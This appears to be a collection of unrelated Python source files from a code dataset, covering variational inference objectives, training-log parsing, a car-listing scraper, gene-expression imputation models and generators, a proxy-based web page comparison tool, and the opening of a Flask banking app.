baseline (tf.Tensor): A trainable estimation for the scale of
the elbo value.
decay (float): The moving average decay for variance normalization.
name (str): Name of this operation in TensorFlow graph.
(default "reinforce")
Returns:
tf.Tensor: The per-data REINFORCE training objective.
See Also:
:meth:`zhusuan.variational.EvidenceLowerBoundObjective.reinforce`
"""
# reinforce requires extra variables to collect the moving average
# statistics, so we need to generate a variable scope
with tf.variable_scope(name, default_name='reinforce'):
return self._vi.zs_elbo().reinforce(
variance_reduction=variance_reduction,
baseline=baseline,
decay=decay,
)
def iwae(self, name=None):
"""
Get the SGVB training objective for importance weighted objective.
Args:
name (str): Name of this operation in TensorFlow graph.
(default "iwae")
Returns:
tf.Tensor: The per-data SGVB training objective for importance
weighted objective.
See Also:
:func:`tfsnippet.variational.iwae_estimator`
"""
_require_multi_samples(self._vi.axis, 'iwae training objective')
with tf.name_scope(name, default_name='iwae'):
return -iwae_estimator(
log_values=self._vi.log_joint - self._vi.latent_log_prob,
axis=self._vi.axis
)
def vimco(self, name=None):
"""
Get the VIMCO training objective.
Args:
name (str): Name of this operation in TensorFlow graph.
(default "vimco")
Returns:
tf.Tensor: The per-data VIMCO training objective.
See Also:
:meth:`zhusuan.variational.ImportanceWeightedObjective.vimco`
"""
_require_multi_samples(self._vi.axis, 'vimco training objective')
with tf.name_scope(name, default_name='vimco'):
return self._vi.zs_importance_weighted_objective().vimco()
def rws_wake(self, name=None):
"""
Get the wake-phase Reweighted Wake-Sleep (RWS) training objective.
Args:
name (str): Name of this operation in TensorFlow graph.
(default "rws_wake")
Returns:
tf.Tensor: The per-data wake-phase RWS training objective.
See Also:
:meth:`zhusuan.variational.InclusiveKLObjective.rws`
"""
_require_multi_samples(
self._vi.axis, 'reweighted wake-sleep training objective')
with tf.name_scope(name, default_name='rws_wake'):
return self._vi.zs_klpq().rws()
class VariationalEvaluation(object):
"""Factory for variational evaluation outputs."""
def __init__(self, vi):
"""
Construct a new :class:`VariationalEvaluation`.
Args:
vi (VariationalInference): The variational inference object.
"""
self._vi = vi
def importance_sampling_log_likelihood(self, name=None):
"""
Compute :math:`log p(x)` by importance sampling.
Args:
name (str): Name of this operation in TensorFlow graph.
(default "importance_sampling_log_likelihood")
Returns:
tf.Tensor: The per-data :math:`log p(x)`.
See Also:
:meth:`zhusuan.evaluation.is_loglikelihood`
"""
_require_multi_samples(
self._vi.axis, 'importance sampling log-likelihood')
return importance_sampling_log_likelihood(
log_joint=self._vi.log_joint,
latent_log_prob=self._vi.latent_log_prob,
axis=self._vi.axis,
name=name or 'importance_sampling_log_likelihood'
)
is_loglikelihood = importance_sampling_log_likelihood
"""Short-cut for :meth:`importance_sampling_log_likelihood`."""
``` |
{
"source": "897741007/EIAA",
"score": 3
} |
#### File: 897741007/EIAA/analysis_log.py
```python
import pandas as pd
import numpy as np
from pandas.io.parsers import read_csv
class log_rec():
def __init__(self, log_file):
self.log_file = log_file
self.mark = log_file.split('.')[-1]
self.info_, self.log_ = self.load_log()
def load_log(self):
with open(self.log_file, 'r') as f:
rec = []
info = []
tag_r = 0
tag_i = 0
for l in f:
if l.startswith('='):
rec.append([])
info.append([])
tag_r = 0
tag_i = 1
elif l.startswith('-'):
tag_r = 1
tag_i = 0
if tag_i:
info[-1].append(l.strip())
if tag_r:
rec[-1].append(l.strip())
return info, rec
def sep_rec(self, rec):
rec_ = rec.strip('[]').split('] [')
rec_arg = rec_[0]
rec_terms = {}
for t in rec_[1:]:
tn, vn = t.split(' ')
rec_terms[tn] = vn
return rec_arg, rec_terms
def get_term(self, arg, terms, terms_type=None, to_file=False):
if terms_type == None:
terms_type = [float for _ in terms]
else:
assert len(terms) == len(terms_type)
filtered = []
for rep in self.log_:
filtered.append([])
for rec in rep:
rec_arg, reg_terms = self.sep_rec(rec)
if rec_arg == arg:
temp = [reg_terms[i] for i in terms]
temp = [terms_type[i](temp[i]) for i in range(len(terms))]
filtered[-1].append(temp)
if to_file:
for rep_idx, rep in enumerate(filtered):
index = list(range(len(rep)))
file_data = {'index':index}
for t_idx in range(len(terms)):
file_data[terms[t_idx]] = [i[t_idx] for i in rep]
file_data = pd.DataFrame(file_data)
file_data.to_csv('{0}_analysis_rep{1}.csv'.format(self.log_file, rep_idx), index=False)
else:
return filtered
def get_val_test(self, term, by='step', to_file=False):
assert by in ('step', 'epoch')
filtered = []
for rep in self.log_:
filtered.append({'validation':[], 'test':[]})
for rec in rep:
rec_arg, rec_terms = self.sep_rec(rec)
if ' ' in rec_arg:
tag_s, tag_p = rec_arg.split(' ')
if tag_s == by:
v = float(rec_terms[term])
filtered[-1][tag_p].append(v)
if not to_file:
store = []
for rep_idx, rep in enumerate(filtered):
index = list(range(1, len(rep['test'])+1))
file_data = {'index':index, 'validation':rep['validation'], 'test':rep['test']}
file_data = pd.DataFrame(file_data)
if to_file:
file_data.to_csv('{0}_{1}_rep{2}.csv'.format(self.mark, term, rep_idx), index=False)
else:
store.append(file_data)
if not to_file:
return store
def summary(files, best='min'):
assert best in ('min', 'max')
summ = {}
for f in files:
strategy = '_'.join(f.split('_')[:-1])
d = pd.read_csv(f)
val = d['validation']
test = d['test']
if best == 'min':
best_val_loc = np.argmin(val)
else:
best_val_loc = np.argmax(val)
best_test = test[best_val_loc]
summ[strategy] = best_test
#summ = pd.DataFrame(summ)
return summ
def summ(files):
k = log_rec(files)
z = k.get_val_test('MAE')
log = {}
ilter = len(k.info_)
tt = []
val = []
b_tt = []
for i in range(ilter-1, -1, -1):
tt.append(min(z[i]['test']))
val.append(min(z[i]['validation']))
b_tt.append(z[i]['test'][np.argmin(z[i]['validation'])])
log['test'] = tt
log['validation'] = val
log['test_at_validation'] = b_tt
return log
``` |
{
"source": "89885512495/CarsScraper",
"score": 3
} |
#### File: 89885512495/CarsScraper/app.py
```python
from avito import Avito
from drom import Drom
def collect_data(model: str, pages: int):
"""Get list of cars from sources"""
collected_data = []
for page in range(1, pages):
# collecting always starts from 1-t page
print(f"Собираю информацию со страницы - {page}")
avito_cars = Avito(model, page)
drom_cars = Drom(model, page)
# if source havn`t got data on one of the page, it will be empty [] list
# so we dont need it
data_from_avito = list(avito_cars.get_content())
if data_from_avito:
collected_data += data_from_avito
data_from_drom = list(drom_cars.get_content())
if data_from_drom:
collected_data += data_from_drom
# sort from lowest to highest price
collected_data.sort(key=lambda i: i[1])
print("\nВот, что я нашел:")
for i in range(len(collected_data)):
print(
collected_data[i][0] + "г., ",
"Цена - ", collected_data[i][1], "₽",
", Источник: ", collected_data[i][2],
)
if __name__ == "__main__":
collect_data("toyota", pages=2)
``` |
{
"source": "899la/GTEx-imputation",
"score": 3
} |
#### File: GTEx-imputation/data/generators.py
```python
from data.gtex_generator import GTExGenerator
from data.tcga_generator import TCGAGenerator
def get_generator(name):
print('Dataset: {}'.format(name))
if name == 'GTEx':
return GTExGenerator
elif name == 'TCGA':
return TCGAGenerator
else:
raise ValueError('Unknown generator {}'.format(name))
```
#### File: GTEx-imputation/data/gtex_generator.py
```python
import numpy as np
import pandas as pd
from data.data_utils import standardize, split_train_test, sample_mask
from data.pathways import select_genes_pathway
GTEX_FILE = '/home/rv340/adversarial-gtex/data/GTEX_data.csv'
METADATA_FILE = '/home/rv340/adversarial-gtex/data/GTEx_Analysis_2017-06-05_v8_Annotations_SubjectPhenotypesDS.txt'
def GTEx(file, random_seed=0):
df = pd.read_csv(file, index_col=0).sample(frac=1, random_state=random_seed)
tissues = df['tissue'].values
sampl_ids = df.index.values
del df['tissue']
gene_symbols = df.columns.values
return np.float32(df.values), gene_symbols, sampl_ids, tissues
def GTEx_metadata(file):
df = pd.read_csv(file, delimiter='\t')
df = df.set_index('SUBJID')
return df
class GTExGenerator:
def __init__(self, file=GTEX_FILE, metadata_file=METADATA_FILE, pathway=None, batch_size=128, m_low=0.5, m_high=0.5,
random_seed=0, inplace_mode=False):
np.random.seed(random_seed)
self.file = file
self.metadata_file = metadata_file
self.batch_size = batch_size
self.m_low = m_low
self.m_high = m_high
self.pathway = pathway
self.inplace_mode = inplace_mode
# Load data
x, gene_symbols, self.sample_ids, self.tissues = GTEx(file)
# Select genes from specific pathway
gene_idxs, self.gene_symbols = select_genes_pathway(gene_symbols, pathway)
self.x = x[:, gene_idxs]
self.nb_genes = len(self.gene_symbols)
# Load metadata
df_metadata = GTEx_metadata(metadata_file)
self.metadata = df_metadata
# Process categorical metadata
cat_cols = ['SEX', 'COHORT'] # 'SEX', 'COHORT'
self.cat_cols = cat_cols
df_metadata[cat_cols] = df_metadata[cat_cols].astype('category')
cat_dicts = [df_metadata[cat_col].cat.categories.values for cat_col in cat_cols]
df_metadata[cat_cols] = df_metadata[cat_cols].apply(lambda x: x.cat.codes)
cat_covs = df_metadata.loc[self.sample_ids, cat_cols].values
tissues_dict_inv = np.array(list(sorted(set(self.tissues))))
tissues_dict = {t: i for i, t in enumerate(tissues_dict_inv)}
tissues = np.vectorize(lambda t: tissues_dict[t])(self.tissues)
cat_dicts.append(tissues_dict_inv)
cat_covs = np.concatenate((cat_covs, tissues[:, None]), axis=-1)
cat_covs = np.int32(cat_covs)
self.tissues_dict = tissues_dict
self.tissues_dict_inv = tissues_dict_inv
self.vocab_sizes = [len(c) for c in cat_dicts]
self.nb_categorical = cat_covs.shape[-1]
# Process numerical metadata
num_cols = ['AGE'] # 'AGE'
num_covs = df_metadata.loc[self.sample_ids, num_cols].values
num_covs = standardize(num_covs)
num_covs = np.float32(num_covs)
self.nb_numeric = num_covs.shape[-1]
# Train/val/test split
x_train, x_test, sampl_ids_train, sampl_ids_test = split_train_test(self.x, self.sample_ids)
x_train = standardize(x_train)
x_test = standardize(x_test)
x_train, x_val, _, sampl_ids_val = split_train_test(x_train, sampl_ids_train, train_rate=0.8)
self.x_train = x_train
self.x_val = x_val
self.x_test = x_test
num_covs_train, num_covs_test, _, _ = split_train_test(num_covs, self.sample_ids)
num_covs_train = standardize(num_covs_train)
num_covs_test = standardize(num_covs_test)
num_covs_train, num_covs_val, _, _ = split_train_test(num_covs_train, sampl_ids_train, train_rate=0.8)
self.num_covs_train = num_covs_train
self.num_covs_val = num_covs_val
self.num_covs_test = num_covs_test
cat_covs_train, cat_covs_test, _, _ = split_train_test(cat_covs, self.sample_ids)
cat_covs_train, cat_covs_val, sampl_ids_train, sampl_ids_val = split_train_test(cat_covs_train,
sampl_ids_train,
train_rate=0.8)
self.cat_covs_train = cat_covs_train
self.cat_covs_val = cat_covs_val
self.cat_covs_test = cat_covs_test
self.sample_ids_train = sampl_ids_train
self.sample_ids_val = sampl_ids_val
self.sample_ids_test = sampl_ids_test
self.train_mask = sample_mask(len(sampl_ids_train), self.nb_genes, m_low=m_low, m_high=m_high)
self.val_mask = sample_mask(len(sampl_ids_val), self.nb_genes, m_low=m_low, m_high=m_high)
self.test_mask = sample_mask(len(sampl_ids_test), self.nb_genes, m_low=m_low, m_high=m_high)
"""
def train_sample(self, size=None):
if size is None:
size = self.batch_size
sample_idxs = np.random.choice(self.x_train.shape[0], size=size, replace=False)
x = self.x_train[sample_idxs]
cc = self.cat_covs_train[sample_idxs]
nc = self.num_covs_train[sample_idxs]
return x, cc, nc
"""
def train_sample_MCAR(self, size=None, alpha=0.5, beta=0.5):
if size is None:
size = self.batch_size
sample_idxs = np.random.choice(self.x_train.shape[0], size=size, replace=False)
x = self.x_train[sample_idxs]
cc = self.cat_covs_train[sample_idxs]
nc = self.num_covs_train[sample_idxs]
mask_2 = sample_mask(size, self.nb_genes, m_low=alpha, m_high=beta)
if self.inplace_mode:
mask_1 = self.train_mask[sample_idxs]
else:
mask_1 = sample_mask(size, self.nb_genes, m_low=self.m_low, m_high=self.m_high)
mask = (mask_1, mask_2)
# x, cc, nc = self.train_sample(size)
# x_ = mask * x
# y = (1 - mask) * x
return (x, cc, nc, mask), x
def train_iterator_MCAR(self, alpha=0.5, beta=0.5):
while True:
yield self.train_sample_MCAR(size=self.batch_size, alpha=alpha, beta=beta)
def val_sample(self):
x = self.x_val
cc = self.cat_covs_val
nc = self.num_covs_val
return x, cc, nc
def val_sample_MCAR(self, alpha=0.5, beta=0.5):
x, cc, nc = self.val_sample()
# size = x.shape[0]
if self.inplace_mode:
input_mask = sample_mask(x.shape[0], self.nb_genes, m_low=alpha, m_high=beta)
mask = (self.val_mask, input_mask) # Trick to speed up training
else:
mask = sample_mask(x.shape[0], self.nb_genes, m_low=self.m_low, m_high=self.m_high)
# mask = sample_mask(size, self.nb_genes, m_low=m_low, m_high=m_high)
# x_ = mask * x
# y = (1 - mask) * x
return (x, cc, nc, mask), x
def test_sample(self):
x = self.x_test
cc = self.cat_covs_test
nc = self.num_covs_test
return x, cc, nc
def test_sample_MCAR(self, m_low=0.5, m_high=0.5, random_seed=0):
if self.inplace_mode:
return self.train_sample_MCAR(size=len(self.sample_ids_train))
np.random.seed(random_seed)
x, cc, nc = self.test_sample()
size = x.shape[0]
mask = sample_mask(size, self.nb_genes, m_low=m_low, m_high=m_high)
# x_ = mask * x
# y = (1 - mask) * x
return (x, cc, nc, mask), x
```
#### File: GTEx-imputation/data/tcga_generator.py
```python
import numpy as np
import pandas as pd
from data.data_utils import standardize, split_train_test, sample_mask, ENSEMBL_to_gene_symbols
from data.pathways import select_genes_pathway
def TCGA_FILE(cancer_type):
return '/local/scratch/rv340/tcga/TCGA-{}.htseq_fpkm.tsv'.format(cancer_type)
def TCGA_METADATA_FILE(cancer_type):
return '/local/scratch/rv340/tcga/{}_clinicalMatrix'.format(cancer_type)
def get_GTEx_tissue(cancer_type):
if cancer_type == 'LAML':
return 'Whole_Blood', 48
elif cancer_type == 'BRCA':
return 'Breast_Mammary_Tissue', 19
elif cancer_type == 'LUAD':
return 'Lung', 31
else:
raise ValueError('Cancer type {} not supported'.format(cancer_type))
def TCGA(file, clinical_file, tissue_idx=None, gtex_gene_symbols=None):
df = pd.read_csv(file, delimiter='\t')
df = df.set_index('Ensembl_ID')
# Transform gene symbols
gene_symbols, ENSEMBL_found = ENSEMBL_to_gene_symbols(df.index)
df = df.loc[ENSEMBL_found]
df = df.rename(index=dict(zip(df.index, gene_symbols)))
if gtex_gene_symbols is not None:
df = df.loc[gtex_gene_symbols]
gene_symbols = gtex_gene_symbols
df = df.groupby('Ensembl_ID', group_keys=False).apply(
lambda x: x[x.sum(axis=1) == np.max(x.sum(axis=1))]) # Remove duplicates, keep max
# Get data
x_TCGA = df.values.T
# Process covariates
sample_ids = df.columns
clinical_df = pd.read_csv(clinical_file, delimiter='\t')
idxs = [np.argwhere(s[:-1] == clinical_df['sampleID']).ravel()[0] for s in df.columns]
gender = np.array([0 if g == 'MALE' else 1 for g in clinical_df.iloc[idxs]['gender']])
age = clinical_df.iloc[idxs]['age_at_initial_pathologic_diagnosis'].values
mean_age = 52.7763 # Mean age GTEx
std_age = 12.9351 # Std age GTEx
age = (age - mean_age) / std_age
cc_TCGA = np.zeros((x_TCGA.shape[0], 3))
cc_TCGA[:, 0] = gender
cc_TCGA[:, 2] = tissue_idx
nc_TCGA = age[..., None]
return x_TCGA, gene_symbols, sample_ids, np.int32(cc_TCGA), nc_TCGA
class TCGAGenerator:
def __init__(self, pathway=None, cancer_type=None, file=None, metadata_file=None,
gene_symbols=None, batch_size=128, m_low=0.5, m_high=0.5, random_seed=0):
assert cancer_type or (file and metadata_file)
if file is None:
file = TCGA_FILE(cancer_type)
if metadata_file is None:
metadata_file = TCGA_METADATA_FILE(cancer_type)
self.tissue = None
self.tissue_idx = None
if cancer_type:
self.tissue, self.tissue_idx = get_GTEx_tissue(cancer_type)
np.random.seed(random_seed)
self.file = file
self.metadata_file = metadata_file
self.batch_size = batch_size
self.m_low = m_low
self.m_high = m_high
self.pathway = pathway
# Load data
x_TCGA, gene_symbols, sample_ids, cc_TCGA, nc_TCGA = TCGA(file, metadata_file, tissue_idx=self.tissue_idx,
gtex_gene_symbols=gene_symbols)
# Select genes from specific pathway
gene_idxs, self.gene_symbols = select_genes_pathway(gene_symbols, pathway)
self.x = standardize(np.log(1 + x_TCGA[:, gene_idxs]))
self.x[np.isnan(self.x)] = 0 # Genes with std 0
self.nb_genes = len(self.gene_symbols)
# Store covariates
self.cat_covs = cc_TCGA
self.num_covs = nc_TCGA
def train_sample(self, size=None):
if size is None:
size = self.batch_size
sample_idxs = np.random.choice(self.x.shape[0], size=size, replace=False)
x = self.x[sample_idxs]
cc = self.cat_covs[sample_idxs]
nc = self.num_covs[sample_idxs]
return x, cc, nc
def train_sample_MCAR(self, size=None, m_low=None, m_high=None):
if size is None:
size = self.batch_size
if m_low is None:
m_low = self.m_low
if m_high is None:
m_high = self.m_high
mask = sample_mask(size, self.nb_genes, m_low=m_low, m_high=m_high)
x, cc, nc = self.train_sample(size)
# x_ = mask * x
# y = (1 - mask) * x
return (x, cc, nc, mask), x
def train_iterator_MCAR(self):
while True:
yield self.train_sample_MCAR()
def val_sample(self):
x = self.x
cc = self.cat_covs
nc = self.num_covs
return x, cc, nc
def val_sample_MCAR(self, m_low=None, m_high=None):
if m_low is None:
m_low = self.m_low
if m_high is None:
m_high = self.m_high
x, cc, nc = self.val_sample()
size = x.shape[0]
mask = sample_mask(size, self.nb_genes, m_low=m_low, m_high=m_high)
# x_ = mask * x
# y = (1 - mask) * x
return (x, cc, nc, mask), x
def test_sample(self):
x = self.x
cc = self.cat_covs
nc = self.num_covs
return x, cc, nc
def test_sample_MCAR(self, m_low=None, m_high=None, random_seed=None):
if random_seed is not None:
np.random.seed(random_seed)
if m_low is None:
m_low = self.m_low
if m_high is None:
m_high = self.m_high
x, cc, nc = self.test_sample()
size = x.shape[0]
mask = sample_mask(size, self.nb_genes, m_low=m_low, m_high=m_high)
# x_ = mask * x
# y = (1 - mask) * x
return (x, cc, nc, mask), x
```
#### File: GTEx-imputation/models/inductive_imputer.py
```python
from models.base_imputer import BaseImputer
import tensorflow as tf
tfk = tf.keras
tfkl = tf.keras.layers
class InductiveImputer(BaseImputer):
def __init__(self, x_dim, vocab_sizes, nb_numeric, nb_categoric, config, name='InductiveImputer', **kwargs):
super(InductiveImputer, self).__init__(x_dim, vocab_sizes, nb_numeric, nb_categoric, config, name=name,
**kwargs)
def loss_fn(self, x, x_gen, eps=1e-7):
x, mask = x
# Masks variables that were provided as input in the forward pass
x_ = x * (1 - mask) # Input variables
x_gen_ = x_gen * (1 - mask) # Reconstructed input variables
mask_counts = tf.reduce_sum(1 - mask, axis=-1) # Shape=(nb_samples, )
loss = tf.reduce_sum((1 - mask) * tf.math.squared_difference(x_, x_gen_), axis=-1)
return tf.reduce_mean(loss / (mask_counts + eps))
```
#### File: GTEx-imputation/models/pseudomask_imputer.py
```python
import tensorflow as tf
from models.base_imputer import BaseImputer
from models.train_utils import sample_mask_tf
from data.data_utils import sample_mask
import numpy as np
tfk = tf.keras
tfkl = tf.keras.layers
class PseudoMaskImputer(BaseImputer):
def __init__(self, x_dim, vocab_sizes, nb_numeric, nb_categoric, config, m_low=0.5, m_high=0.5, name='UnguidedImputer', **kwargs):
super(PseudoMaskImputer, self).__init__(x_dim, vocab_sizes, nb_numeric, nb_categoric, config, name=name,
**kwargs)
self.m_low = m_low
self.m_high = m_high
def loss_fn(self, x, x_gen, eps=1e-7):
x, mask = x
# input_mask = tf.cast(x != 0, tf.float32)
# output_mask = mask * (1 - input_mask)
output_mask = mask
# Masks variables that were provided as input in the forward pass
x_ = x * output_mask # Input variables
x_gen_ = x_gen * output_mask # Reconstructed input variables
mask_counts = tf.reduce_sum(output_mask, axis=-1) # Shape=(nb_samples, )
loss = tf.reduce_sum(output_mask * tf.math.squared_difference(x_, x_gen_), axis=-1)
return tf.reduce_mean(loss / (mask_counts + eps))
def call(self, x, **kwargs):
x, cat, num, mask = x
if type(mask) is tuple: # Keras is initialising
mask = mask[0]
x_ = x * mask
return self.model([x_, cat, num, mask], **kwargs)
def train_step(self, data):
# Unpack the data. Its structure depends on your model and
# on what you pass to `fit()`.
x, y = data
x, cat, num, mask = x
mask, input_mask = mask
if self.config.inplace_mode:
output_mask = mask * (1 - input_mask)
input_mask = mask * input_mask
else: # mask should be all ones
output_mask = (1 - input_mask)
with tf.GradientTape() as tape:
y_pred = self.call((x, cat, num, input_mask), training=True) # Forward pass
# Compute the loss value
# (the loss function is configured in `compile()`)
loss = self.loss_fn((x, output_mask), y_pred) # compiled_loss((x, mask), y_pred, regularization_losses=self.losses)
# Compute gradients
trainable_vars = self.trainable_variables
gradients = tape.gradient(loss, trainable_vars)
# Update weights
self.optimizer.apply_gradients(zip(gradients, trainable_vars))
# Update metrics (includes the metric that tracks the loss)
self.compiled_metrics.update_state(y, y_pred)
# Return a dict mapping metric names to current value
return {**{'loss': loss}, **{m.name: m.result() for m in self.metrics}}
def test_step(self, data):
# Unpack the data
x, y = data
x, cat, num, mask = x
bs = tf.shape(x)[0]
if self.config.inplace_mode:
mask, input_mask = mask
# input_mask = sample_mask(bs=mask.shape[0], nb_genes=self.x_dim) # sample_mask_tf(bs=bs, nb_genes=self.x_dim)
output_mask = mask * (1 - input_mask)
input_mask = mask * input_mask
else:
output_mask = (1 - mask)
input_mask = mask
# input_mask = sample_mask(bs=self.config, nb_genes=self.x_dim)
# Compute predictions
y_pred = self.call((x, cat, num, input_mask), training=False)
# Updates the metrics tracking the loss
loss = self.loss_fn((x, output_mask), y_pred) # compiled_loss(y, y_pred, regularization_losses=self.losses)
# Update the metrics.
self.compiled_metrics.update_state(y, y_pred)
# Return a dict mapping metric names to current value.
# Note that it will include the loss (tracked in self.metrics).
return {**{'loss': loss}, **{m.name: m.result() for m in self.metrics}}
``` |
{
"source": "89berner/abnormal",
"score": 3
} |
#### File: abnormal/abnormal/Target.py
```python
from AutoVivification import AutoVivification
import Utils
import cv2
import numpy as np
import hashlib
import pprint
import logging
import threading
import Queue
from sets import Set
from Result import Result
import traceback
import sys
from Observer import Observer
class ThreadProcessTarget(threading.Thread):
"""Threaded Url Grab"""
def __init__(self, queue, working_observers, max_ips, capture_on):
threading.Thread.__init__(self)
self.queue = queue
self.working_observers = working_observers
self.max_ips = max_ips
self.capture_on = capture_on
def run(self):
while True:
observer = self.queue.get()
if len(self.working_observers) < self.max_ips:
if observer.request(): #Get content and screenshots
self.working_observers.append(observer)
logging.debug("Count is now %s of %s" % (len(self.working_observers), self.max_ips) )
self.queue.task_done()
class Target:
def __init__(self, name, urls, ip_list, options):
self.urls = urls
self.max_threads = options.n_threads
self.name = name
self.max_ips = options.n_proxies
self.capture_on = options.capture_on
self.options = options
self.possible_observers = []
for ip in ip_list:
self.possible_observers.append(Observer(ip,urls,options))
self.diff_vars = {}
self.missing_vars = {}
self.missing_links = {}
self.diff_images = {}
self.diff_marked_images = {}
for url in urls:
self.diff_vars[url] = {}
self.missing_vars[url] = Set()
self.missing_links[url] = Set()
self.diff_images[url] = {}
self.diff_marked_images[url] = {}
#Set instance variables
self.observers = []
self.results = Result(name, urls)
self.observers_vars = AutoVivification()
self.processed = AutoVivification()
self.contourns = {}
self.observers_map = {}
def process(self):
#Get observers to use
self.get_working_observers()
if (not self.options.no_source):
#Set the data based on the content and the screenshot
self.process_observers()
#Check the difference between observers
#populate missing_vars, diff_vars, missing_links, diff_images, diff_marked_images
self.analyze_observers()
#Compare observers to create Result object
self.compare_observers()
def get_working_observers(self):
working_observers = []
queue = Queue.Queue()
for i in range(self.max_threads):
t = ThreadProcessTarget(queue,working_observers,self.max_ips,self.capture_on)
t.setDaemon(True)
t.start()
for observer in self.possible_observers:
queue.put(observer)
queue.join()
self.observers = working_observers #[:self.max_ips]
for observer in working_observers:
self.observers_map[observer.ip] = observer
logging.info("Got %s working observers" % len(working_observers))
def process_observers(self):
for observer in self.observers:
for url in self.urls:
address = observer.get_address(url)
address.set_data()
def analyze_observers(self):
#For each url match observer by observer and see
for url in self.urls:
for observer1 in self.observers:
for observer2 in self.observers:
if (observer1.ip != observer2.ip):
if (not self.options.no_source):
#what variables are missing or different
self.check_vars(observer1,observer2,url)
#Find difference in links
self.check_links(observer1,observer2,url)
#difference between screenshots
if self.capture_on:
self.check_screenshots(observer1,observer2,url)
def check_vars(self,observer1,observer2,url):
logging.debug('Checking vars between %s-%s for %s' % (observer1.ip,observer2.ip,url))
vars1 = observer1.get_address(url).vars
vars2 = observer2.get_address(url).vars
for var in vars1:
logging.debug('Comparing for vars: %s %s' % (var,vars1[var]))
if (var not in vars2):
self.missing_vars[url].add(var)
elif (vars1[var] != vars2[var]):
if not var in self.diff_vars[url]:
self.diff_vars[url][var] = 0
self.diff_vars[url][var] += 1
#Populate observers index
for var in vars1:
self.observers_vars[observer1.ip][url][var] = vars1[var]
for var in vars2:
self.observers_vars[observer2.ip][url][var] = vars2[var]
def check_screenshots(self, observer1, observer2, url):
if not self.get_processed(observer2,observer1,url,'screen'):
image1 = observer1.read_image(url)
image2 = observer2.read_image(url)
Utils.resize_images(image1,image2)
difference_1 = cv2.subtract(image1, image2)
difference_2 = cv2.subtract(image2, image1)
result = not np.any(difference_1)
#If different
if result is False:
logging.debug('Comparing images between %s-%s for %s' % (observer1.ip,observer2.ip,url))
#First set up different types of images to have them on their own
self.set_different_image(image1, url, observer1.get_image(url))
self.set_different_image(image2, url, observer2.get_image(url))
#logging.debug('The images are different')
filename_1 = "%s-%s-%s" % (observer1.ip, observer2.ip, url)
#cv2.imwrite("tmp/comp/%s.jpg" % Utils.as_filename(filename_1), difference_1)
#filename_2 = "%s-%s-%s" % (observer2.ip, observer1.ip, url)
#cv2.imwrite("tmp/comp/%s.jpg" % Utils.as_filename(filename_2), difference_2)
#concat_images = np.concatenate((image1, image2, difference_1, difference_2), axis=1)
#cv2.imwrite("tmp/comp_full/%s.jpg" % Utils.as_filename(filename_1), concat_images)
contourn_image1 = Utils.draw_contourns(image1,image2)
file_path = "tmp/comp_draw/%s.jpg" % Utils.as_filename(filename_1)
cv2.imwrite(file_path, contourn_image1)
self.set_different_marked_image(contourn_image1,url,file_path)
self.set_processed(observer1,observer2,url,'screen')
#logging.debug("Finished comparing images..")
else:
#logging.debug("Skipping comparison")
pass
def check_links(self,observer1,observer2,url):
links1 = observer1.get_address(url).links
links2 = observer1.get_address(url).links
for link in links1:
logging.debug('Comparing links: %s' % link)
if link not in links2:
self.missing_links[url].add(var)
def compare_observers(self):
for url in self.urls:
self.compare(url)
def compare(self,url):
logging.debug('Doing compare for %s' % url)
url_results = self.results.get(url)
#Looking for missing js variables
for missing in self.missing_vars[url]:
logging.debug('Looking for %s' % missing)
for observer in self.observers:
addr = observer.get_address(url)
if missing not in addr.vars:
logging.debug("%s is missing" % missing)
url_results.set_missing_var(missing)
#Looking for differences in js variables
for diff_var in self.diff_vars[url]:
logging.debug('Comparing %s' % diff_var)
for observer in self.observers:
addr = observer.get_address(url)
if diff_var in addr.vars:
var_value = addr.vars[diff_var]
url_results.set_diff_var(diff_var,var_value)
#Looking for missing links
for missing in self.missing_links[url]:
logging.debug('Looking for %s' % missing)
for observer in self.observers:
addr = observer.get_address(url)
if missing not in addr.links:
logging.debug("%s is missing" % missing)
url_results.set_missing_link(missing)
#Looking for different captures
for md5 in self.diff_images[url]:
logging.debug('Looking for %s' % md5)
url_results.set_diff_images(md5, self.diff_images[url][md5])
#Looking for different marked captures
for md5 in self.diff_marked_images[url]:
logging.debug('Looking for %s' % md5)
url_results.set_diff_marked_images(md5, self.diff_marked_images[url][md5])
def set_different_image(self,image, url, filename):
image_hash = hashlib.md5(image).hexdigest()
if image_hash not in self.diff_images[url]:
self.diff_images[url][image_hash] = filename
def set_different_marked_image(self,image, url, filename):
image_hash = hashlib.md5(image).hexdigest()
if image_hash not in self.diff_marked_images[url]:
self.diff_marked_images[url][image_hash] = filename
def report(self):
print "Report for %s" % self.name
self.results.report()
pp = pprint.PrettyPrinter(indent=4)
logging.debug(pp.pprint(self.observers_vars))
#Go through the observers looking that at least one has the var
def check_var(self,name):
for observer in self.observers:
for url in observer.urls:
if name in self.observers_vars[observer.ip][url]:
return True
return False
#Go through the observers looking for the ones that have the variables
def get_var_observers(self,name,value):
result = Set()
for observer in self.observers:
for url in observer.urls:
observer_vars = self.observers_vars[observer.ip][url]
for var in observer_vars:
if var == name:
if len(value):
if observer_vars[var] == value:
result.append(observer)
else:
result.append(observer)
return result
def check_img(self,md5):
for observer in self.observers:
for url in observer.urls:
if md5 == self.observers_map[observer.ip].get_address(url).image_hash:
return True
return False
#Go through the observers looking for the ones that have the variables
def get_img_observers(self,md5):
result = Set()
for observer in self.observers:
for url in observer.urls:
observer_md5 = self.observers_map[observer.ip].get_address(url).image_hash
if observer_md5 == md5:
result.add((url,observer))
return result
def set_processed(self,observer1,observer2,url,m_type):
name = "%s-%s" % (observer1.get_address(url).image_hash, observer2.get_address(url).image_hash)
self.processed[m_type][url][name] = 1
def get_processed(self,observer1,observer2,url,m_type):
name1 = "%s-%s" % (observer1.get_address(url).image_hash, observer2.get_address(url).image_hash)
name2 = "%s-%s" % (observer2.get_address(url).image_hash, observer1.get_address(url).image_hash)
return self.processed[m_type][url][name1] or self.processed[m_type][url][name2]
def close(self):
for observer in self.observers:
for url in observer.urls:
addr = observer.get_address(url)
addr.driver.close()
addr.driver.quit()
```
#### File: abnormal/tests/test_general.py
```python
from abnormal import AB
import proxies
def get_proxies():
return proxies.get_proxies()
def test_create_ab():
ab = AB(get_proxies())
assert ab
def test_get_proxies():
working_proxies = get_proxies()
assert len(working_proxies) > 100
``` |
{
"source": "89erik/localbank",
"score": 3
} |
#### File: localbank/backend/app.py
```python
from flask import Flask, request, json
from pymongo import MongoClient
from bson import json_util
from bson.objectid import ObjectId
import dateutil.parser
import valutta
from errors import ApiException, Forbidden, NotFound, BadRequest
import dto
app = Flask(__name__)
db = MongoClient("localhost", 27017).localbank
valuttaer = valutta.alle_valuttaer()
